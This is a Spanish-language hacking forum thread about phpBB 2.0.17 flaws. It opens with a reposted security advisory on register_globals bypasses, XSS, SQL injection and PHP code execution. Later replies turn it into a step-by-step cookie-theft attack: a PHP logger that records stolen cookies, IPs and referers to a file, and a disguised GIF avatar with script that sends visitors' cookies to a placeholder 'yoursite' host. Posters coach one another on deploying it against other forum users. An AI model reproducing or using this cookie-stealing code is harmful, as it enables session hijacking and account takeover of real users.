Nuevo bug en los phpbb<=2.0.17

Iniciado por sikik, 2 Noviembre 2005, 15:04 PM

0 Miembros y 1 Visitante están viendo este tema.

sikik

jeje pues ya va otro mas para todos los phpbbs..

To get rid of possible security problems caused by not properly
initialised variables phpBB comes with the following piece of
code, that is intended to deregister global variables, which were
created because of the register_globals directive. Unfortunately
there are atleast 3 ways to bypass the protection.

// PHP4+ path
$not_unset = array('HTTP_GET_VARS', 'HTTP_POST_VARS',
'HTTP_COOKIE_VARS', 'HTTP_SERVER_VARS',
'HTTP_SESSION_VARS', 'HTTP_ENV_VARS',
'HTTP_POST_FILES', 'phpEx', 'phpbb_root_path');

// Not only will array_merge give a warning if a parameter
// is not an array, it will actually fail. So we check if
// HTTP_SESSION_VARS has been initialised.
if (!isset($HTTP_SESSION_VARS))
{
$HTTP_SESSION_VARS = array();
}

// Merge all into one extremely huge array; unset
// this later
$input = array_merge($HTTP_GET_VARS, $HTTP_POST_VARS,
$HTTP_COOKIE_VARS, $HTTP_SERVER_VARS,
$HTTP_SESSION_VARS, $HTTP_ENV_VARS,
$HTTP_POST_FILES);

unset($input['input']);
unset($input['not_unset']);

while (list($var,) = @each($input))
{
if (!in_array($var, $not_unset))
{
unset($$var);
}
}

unset($input);

Bypass Vulnerabilities
----------------------

[1] In PHP5 <= 5.0.5 it is possible to register f.e. the global
variable $foobar by supplying a GET/POST/COOKIE variable
with the name 'foobar' but also by supplying a GPC variable
called 'GLOBALS[foobar]'. If the variable is supplied in
that way, the code above will not try to unset $foobar, but
$GLOBALS, which completely bypasses the protection.

[2] When the session extension is not started by a call to
session_start(), PHP does not know about the variables
$_SESSION or $HTTP_SESSION_VARS, which means, it is possible
to fill them with any value if register_globals is turned on.
Combined with the fact (that was even documented in the phpBB
code), that array_merge() will fail in PHP5, when at least
one of the parameters is not an array, it is possible for an
attacker to simply set HTTP_SESSION_VARS to a string and let
the complete protection fail, because $input ends up empty.

[3] When register_long_array is turned off PHP does not know
anymore about all the HTTP_* variables. This means they can
be filled with anything that is completely unrelated to the
existing global variables. It is obvious that the protection
cannot work, when this configuration is choosen.

Additonally to the 3 possible ways to bypass the globals
deregistration code, several not properly initalised variables
were disclosed to the vendor, that can even lead to remote code
execution.

Not properly initialised variables
----------------------------------

[1] Within usercp_register.php the variable 'error_msg' is not
properly initialised and can therefore be used to inject
arbitrary HTML code

[2] Within login.php the variable 'forward_page' is not properly
initialised and can be used to inject arbitrary HTML code

[3] Within search.php the variable 'list_cat' is not properly
initialised and can be used to inject arbitrary HTML

[4] Within usercp_register.php the variable 'signature_bbcode_uid'
is not properly initialised and can be used for SQL injection
of arbitrary 'field=xxx' statements into queries operating
on the user table, when magic_quotes_gpc is turned off.

[5] The same variable [4] can be used to inject f.e. the 'e'
modifier into the first parameter of a preg_replace()
statement, which means, that the second parameter is
evaluated as PHP code. Because the second parameter is
entirely filled with the user supplied signature, it is
possible to execute any PHP code. This can be exploited,
no matter if magic_quotes_gpc is turned on or off, just
2 different code paths need to be triggered.

Proof of Concept:

The Hardened-PHP project is not going to release exploits for any
of these vulnerabilities to the public.

http://www.securityfocus.com/bid/15246/info
http://www.securityfocus.com/bid/15243/info
http://www.zone-h.org/advisories/read/id=8348

saludos.
"Social Engineer -> Because there is no patch for human stupidity".
"Però qui s'ha inclinat sobre l'abisme, qui ha vist, patirà per sempre la temptació de tornar un altre cop a aquest punt negre en el qual les tenebres il·luminen(...)"
Warning: shell_exec() has been disabled for security reasons at line 274.

korgzak

Cada vez me gustan menos los PHPBB.... viva SMF!
Ahora lo probare :D

pisagatos

joder que *****, yo utilizo phpbb porque el smf no me deja instalarlo simpre me da errores, agg que asco de bugs

Robin


mousehack

por ejemplo hagamos algo asi para realizar un robo de cookie...

creamos un archivo llamado cookie.php con el siguiente codigo:

<?php
$cookie 
$_GET['c'];
$ip getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp fopen('log.txt'); // chmod 777 and same directory
fwrite($fp'<br>Cookie: '.$cookie.'</br> IP: ' .$ip'<br> Date and Time: ' .$date'</br> Referer: '.$referer.' ');
fclose($fp);
?>


este codigo creara un archivo log.txt con permiso 777

ahora creamos un avatar para subir a la web vulnerable con el siguiente codigo:

<GIF89aŸ8÷™fÿ™™><html><head><script>alert('http://yoursite/cookies.php?c='+document.cookie);</script></head></html>

y lo guardamos, recordando ponerle la extension .GIF

Salu2


VISITEN MI BLOG PERSONAL....
http://mousehack.blogspot.com/ ...XD

D3C0D3R

para hacer eso hay que usar un modificador de cookies  ???

haber si entendi primero cree co el phpedit el archivo cookie.php con el codigo

<?php
$cookie 
$_GET['c'];
$ip getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp fopen('log.txt'); // chmod 777 and same directory
fwrite($fp'<br>Cookie: '.$cookie.'</br> IP: ' .$ip'<br> Date and Time: ' .$date'</br> Referer: '.$referer.' ');
fclose($fp);
?>


ahora bien el archivo log.txt  :-\

y luego creamos un archivo que sea avatar.php.gif  ??? lo subimos y luego que  ???

pd. ya me cree un foro phpbb 2.0.17 para probar

sikik

tienes que guradarlo .gif no.php.gif  en tu hosting, das permisos de escritura a todos los usuarios al archivo log.txt
te pones el .gif de avatar y todos los usuarios que visiten tus posts les robarás la cookie


saludos.
"Social Engineer -> Because there is no patch for human stupidity".
"Però qui s'ha inclinat sobre l'abisme, qui ha vist, patirà per sempre la temptació de tornar un altre cop a aquest punt negre en el qual les tenebres il·luminen(...)"
Warning: shell_exec() has been disabled for security reasons at line 274.

Robin

Citar<GIF89aŸ8÷™fÿ™™><html><head><script>alert('http://yoursite/cookies.php?c='+document.cookie);</script></head></html>


no me sale la imagen .. solo un x y el codigo no se executa..
::)

mousehack

no tiene que salir ninguna imagen!!! es un gif modificado y el codigo, en principio, crea un archivo ¨log.txt¨ en tu server con las cookies

salu2


VISITEN MI BLOG PERSONAL....
http://mousehack.blogspot.com/ ...XD

sikik

tienes que cambiar http://yoursite/cookies.php poir donde hayas puesto tu cookies.php
"Social Engineer -> Because there is no patch for human stupidity".
"Però qui s'ha inclinat sobre l'abisme, qui ha vist, patirà per sempre la temptació de tornar un altre cop a aquest punt negre en el qual les tenebres il·luminen(...)"
Warning: shell_exec() has been disabled for security reasons at line 274.